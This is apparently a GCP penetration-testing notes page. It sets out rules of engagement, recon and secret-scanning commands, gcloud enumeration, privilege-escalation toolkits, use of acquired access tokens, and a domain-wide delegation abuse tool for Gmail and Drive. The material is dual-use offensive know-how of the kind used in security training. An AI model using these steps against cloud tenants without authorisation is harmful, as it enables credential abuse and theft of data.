#
GCP Pentesting Notes
GCP Notes
These notes have been inspired from the amazing GCP Track at Hackfest 2025 created by Lutzenfried!
#
⚠️ Rules Of Engagement
GCP Security Testing Policy: GCP Acceptable Use Policy
- GCP allows security assessments on resources you control in your own GCP projects/account. Testing of Google’s underlying infrastructure, shared GCP control plane, or other users’ assets is prohibited.
- Testing must respect GCP’s Acceptable Use Policy; you are responsible for what you deploy/configure, and Google is responsible for the underlying cloud.
- There’s no pre-approval required for most in-scope resources, but any action that risks disruption or cross-tenant impact remains forbidden.
Prohibited activities
- Denial-of-service in any form: DoS/DDoS, protocol/port/request flooding, simulated DoS, or attacks against GCP infrastructure or management plane.
- Testing GCP-managed core services or attempting to access other tenants or Google’s internal systems/databases.
Allowed targets (your resources)
- Typical in-scope: your GCE VMs, GKE clusters, Cloud Storage buckets, App Engine services, Cloud Functions you own, networking resources within your project, IAM configuration, APIs/endpoints within your controlled environment.
- Common techniques if low impact: web app testing (SQLi/XSS), exploit validation, vulnerability and port scanning, cautious fuzzing of endpoints within your project boundary.
#
🔧 Technical Requirements
#
General Advices
- Always request viewer/iam.securityReviewer roles for complete recon and escalation checks.
- Use API tokens for custom Python/REST automation if traditional gcloud auth flows are unavailable.
#
Google Cloud SDK Installation
ìnfo Official Install Guid
Official Guide: https://cloud.google.com/sdk/docs/install
Linux
sudo apt-get update
sudo apt-get install google-cloud-climacOS
Download and extract .tar.gz from Google, run install.sh, initialize with gcloud init
#
GCP Attack Matrix
Tool Name: GCP_ATTACK_Matrix
An open-source, community-driven knowledge base of tactics, techniques, and procedures (TTPs) for attacking and defending Google Cloud Platform (GCP) and Google Workspace environments.
#
🔍 Outsider - Recon
#
Multi-Cloud Enumeration
Multi-cloud OSINT tool. Enumerate public resources in AWS, Azure, and Google Cloud.
Tool Name: cloud_enum
pip3 install -r ./requirements.txt
./cloud_enum.py -k targetname -t 10
#
👹 Initial Access - Reon
#
Public Secrets
The goal here is to search for secrets and password that may grant us an Initial Access.
- Google Dorking
- Look for sensitive documents
- Code Repositories
#
Public Code Repo
Tools:
#Scan a repo
trufflehog git https://github.com/trufflesecurity/test_keys --results=verified
#Scan an organization
trufflehog github --org=trufflesecurity --results=verified
#
Authenticate with GCP
There are multiple user type and so, multiple ways to login using gcloud.
User
gcloud auth loginservice account
gcloud auth activate-service-account --key-file=service-account.jsonSet default project:
#List all projects you have access
gcloud projects list
#Set Default Project
gcloud config set project PROJECT_ID
#
Get Access Token
You can use gcloud to ask for access token if you are authenticated.
#OAuth2
gcloud auth print-access-token
#Print ID token (JWT used for CloudRun & API Gateway)
gcloud auth print-identity-tokenPermission Limitation
If you only have limited permissions (example: resourcemanager.projects.get, run.services.list), you are restricted to basic project info and Cloud Run service enumeration.
#
Enumeration
You'll see below a bunch of usefull commands you can use to enumerate as much information as possible inside the GCP Tenant you just got initial access to.
Organization & Project Structure
# List all organizations
gcloud organizations list
# List all folders
gcloud resource-manager folders list --organization=ORG_ID
# List all projects you can see
gcloud projects list
# Project details, parent info
gcloud projects describe PROJECT_ID IAM & Permissions
# List project IAM policy
gcloud projects get-iam-policy PROJECT_ID
# Org-level IAM policy
gcloud organizations get-iam-policy ORG_ID
# Folder IAM
gcloud resource-manager folders get-iam-policy FOLDER_ID
# List service accounts
gcloud iam service-accounts list --project=PROJECT_ID
# List roles (custom/predefined)
gcloud iam roles list --project=PROJECT_ID Cloud Storage
# List buckets
gsutil ls -p PROJECT_ID
# Recursively list bucket contents
gsutil ls -r gs://BUCKET_NAME
# Bucket IAM policy
gsutil iam get gs://BUCKET_NAME Compute
# List VMs
gcloud compute instances list --project=PROJECT_ID
# List disks
gcloud compute disks list --project=PROJECT_ID
# List images
gcloud compute images list --project=PROJECT_ID Networking & Security
# List VPC networks
gcloud compute networks list --project=PROJECT_ID
# List subnets
gcloud compute networks subnets list --project=PROJECT_ID
# List firewalls
gcloud compute firewall-rules list --project=PROJECT_ID
# List SSL certs
gcloud compute ssl-certificates list --project=PROJECT_IDServerless / Managed
# List Cloud Run services
gcloud run services list --project=PROJECT_ID --region=REGION
# Describe Cloud Run
gcloud run services describe SERVICE_NAME --project=PROJECT_ID --region=REGION
# List Cloud Functions
gcloud functions list --project=PROJECT_ID --region=REGION
# Describe functions
gcloud functions describe FUNCTION_NAME --project=PROJECT_ID --region=REGIONDatabases
# List Cloud SQL
gcloud sql instances list --project=PROJECT_ID
# List Firestore
gcloud firestore databases list --project=PROJECT_ID
# List BigQuery datasets
gcloud bigquery datasets list --project=PROJECT_ID Org/Project Policies
# Project org policies
gcloud resource-manager org-policies list --project=PROJECT_ID
# Org org policies
gcloud resource-manager org-policies list --organization=ORG_ID APIs
# List enabled APIs
gcloud services list --project=PROJECT_ID
#
Privilege Escalation & Enumeration Toolkits
Tool Name: RhinoSecurityLabs/GCP-IAM-Privilege-Escalation
# Requires token with IAM Perms
enumerate_member_permissions.py -p PROJECT_ID
#Check Escalation PAth
check_for_privesc.pyTool Name: NetSPI/gcpwn
- Add auth (ADC, service account key, or raw access token)
- Use modules: enum, privesc, exploit etc.
#
🧙 Post Exploitation
Limited Permissions
If token/SA has very limited permissions (can only list Cloud Run, get basic project info), most enumeration and privilege escalation modules will fail until permissions are expanded.
#
How to Use Bearer Tokens in API Calls
If you acquire an OAuth2 access token (ya29...) and want to use it for direct API calls:
curl -H "Authorization: Bearer <your_access_token>" https://cloudresourcemanager.googleapis.com/v1/projects/PROJECT_IDFor JWT (eyJhbGciOi...) tokens, use when services require ID tokens, e.g. Cloud Run endpoints.
Using Access Tokens with Python
Example using requests
import requests
headers = {"Authorization": "Bearer <access_token>"}
resp = requests.get("https://run.googleapis.com/v1/projects/<PROJECT_ID>/locations/-/services", headers=headers)
print(resp.json())Example using google-auth (Only Access Token)
from google.auth.credentials import Credentials
from googleapiclient.discovery import build
creds = Credentials(token=<access_token>)
service = build("run", "v1", credentials=creds)
response = service.projects().locations().services().list(parent="projects/<PROJECT_ID>/locations/-").execute()
print(response)
#
GCP Domain Wide Delegation
Tool Name: Lutzenfried/Delegate
A github Tool to perform GCP Domain Wide Delegation abuse and access Gmail and Drive data.
python delegate.py -k <SERVICE_ACCOUNT_KEY> -i <EMAIL_TO_IMPERSONATE> -m <MODULE> -a <ACTION> [OPTIONS]Check the README.md for more detailed commands.
#
⭐ More Resources
This section is dedicated to other wiki and notes available only regarding Google Cloud.
If you have notes, website related to this topic, feel free to contact me, i would be happy to share the links here :)